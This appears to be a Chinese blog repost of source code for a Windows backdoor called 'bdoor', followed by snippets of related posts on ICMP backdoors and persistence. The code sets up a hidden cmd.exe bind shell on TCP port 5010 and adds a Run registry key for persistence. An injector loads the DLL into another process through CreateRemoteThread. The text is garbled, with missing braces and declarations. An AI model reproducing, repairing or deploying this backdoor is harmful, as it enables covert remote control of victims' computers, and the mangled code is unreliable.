後門程式bdoor及原始碼選擇自 amh 的 blog
#include "stdafx.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32")
#define port 5010
#define reg_run "software//microsoft//windows//currentversion//run"
struct threadparam
;dword winapi controlthread(void *no);
dword winapi bdoor(void *lp);
dword winapi recvthread(void *lp);
dword winapi sendthread(void *lp);
dword winapi writereg(void *no);
bool apientry dllmain( handle hmodule,
dword ul_reason_for_call,
lpvoid lpreserved
)case dll_process_detach:
}return true;
}dword winapi controlthread(void *no)
if((listensock=socket(af_inet,sock_stream,ipproto_tcp))==invalid_socket)
sockaddr_in localaddr,inaddr;
int addrlen=sizeof(inaddr);
localaddr.sin_addr.s_un.s_addr=0;
localaddr.sin_family=af_inet;
localaddr.sin_port=htons(port);
if(bind(listensock,(sockaddr *)&localaddr,sizeof(localaddr))==socket_error)
listen(listensock,5);
while(true)
closesocket(listensock);
::wsacleanup();
}dword winapi writereg(void *no)
;int ret=::getsystemdirectory(syspath,max_path);
if(syspath[ret-1]!='//')
strcat(syspath,"//");
strcat(syspath,"dllinjection.exe");
int len=strlen(syspath);
while(true)
return 0;
}dword winapi bdoor(void *lp)
;sec.nlength=sizeof(sec);
sec.lpsecuritydescriptor=null;
sec.binherithandle=true;
createpipe(&hcmdin,&hwrite,&sec,0);
createpipe(&hread,&hcmdout,&sec,0);
char cmddir[max_path]=;
::getsystemdirectory(cmddir,max_path);
if(cmddir[strlen(cmddir)-1]!='//')
strcat(cmddir,"//");
strcat(cmddir,"cmd.exe");
startupinfo startupinfo=;
startupinfo.cb=sizeof(startupinfo);
startupinfo.dwflags=startf_useshowwindow|startf_usestdhandles;
startupinfo.wshowwindow=sw_hide;
startupinfo.hstderror=startupinfo.hstdoutput=hcmdout;
startupinfo.hstdinput=hcmdin;
process_information processinfo=;
int ret=createprocess(cmddir,null,null,null,true,0,null,null,&startupinfo,&processinfo);
if(ret==0)
closehandle(hcmdin);
closehandle(hcmdout);
dword id1,id2;
handle hrecvthread,hsendthread;
threadparam recvparam=,sendparam=;
recvparam.sock=sock;
recvparam.handle=hwrite;
hrecvthread=createthread(null,0,recvthread,&recvparam,0,&id1);
sendparam.sock=sock;
sendparam.handle=hread;
hsendthread=createthread(null,0,sendthread,&sendparam,0,&id2);
ulong code;
::waitforsingleobject(hrecvthread,infinite);
::getexitcodethread(hsendthread,&code);
::terminatethread(hsendthread,code);
::getexitcodeprocess(processinfo.hprocess,&code);
::terminateprocess(processinfo.hprocess,code);
closesocket(sock);
closehandle(hwrite);
closehandle(hread);
return 0;
}dword winapi recvthread(void *lp)
;threadparam param=*((threadparam *)lp);
while(1)
;int ret=recv(param.sock,temp,1,0);
if(ret==0)
else if(ret==1)
ulong len;
::writefile(param.handle,cmd,strlen(cmd),&len,null);
memset(cmd,0,256);}}
}return 0;
}dword winapi sendthread(void *lp)
;while(1)
sleep(100);
}return 0;
}#include "stdafx.h"
#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"
long getprocessid(char *processname);
int apientry winmain(hinstance hinstance,
hinstance hprevinstance,
lpstr lpcmdline,
int ncmdshow)
;char *premoteaddr=null;
int ret=::getsystemdirectory(pdllpath,max_path);
if(pdllpath[ret-1]!='//')
strcat(pdllpath,"//");
strcat(pdllpath,"bdoor.dll");
if(::_access(pdllpath,0)==-1)
return -1;
premoteaddr=(char*)::virtualallocex(hprocess,null,strlen(pdllpath)+1,mem_commit,page_readwrite);
if(premoteaddr==null)
return -1;
ret=::writeprocessmemory(hprocess,premoteaddr,pdllpath,strlen(pdllpath),null);
if(ret==0)
return -1;
handle hremotethread=::createremotethread(hprocess,null,0,pthreadproc,premoteaddr,0,null);
sleep(100);
::virtualfreeex(hprocess,premoteaddr,strlen(pdllpath)+1,mem_decommit);
::closehandle(hprocess);
return 0;
}long getprocessid(char *processname)
; bool fret;
pe32.dwsize=sizeof(processentry32);
fret=process32first(hsnapshot,&pe32);
if(!fret)
return -1;
int g=0;
char drive[_max_drive]=;
char dir[_max_dir]=;
char fname[_max_fname]=;
char ext[_max_ext]=;
do }while(process32next(hsnapshot,&pe32));
if(g!=1)
return -1;
return pe32.th32processid;
}
ICMP後門程式原碼
client.cpp include include include pragma ment lib,ws2 32.lib char sendmsg 256 the ip header typedef struct iphdr ipheader typedef struct ihdr icmphea...
後門程式BDoor原始碼
include stdafx.h include winsock2.h pragma comment lib,ws2 32 define port 5010 define reg run software microsoft windows currentversion run struct thr...
後門留駐程式的相關學習
今天看了一些後門留駐程式,我真是太懶了,每次說更新部落格都更到一半就不想寫了嗚嗚嗚嗚o o,這次是資訊保安的大作業,只寫了一題,還沒有完全寫完,等我寫完再上 哈 雖然學了三年的資訊保安,但我還是完完全全的小白啊o o 主要記錄一下今天學的內容吧 維基百科鏈結 分享乙個介紹svchost.exe很詳細...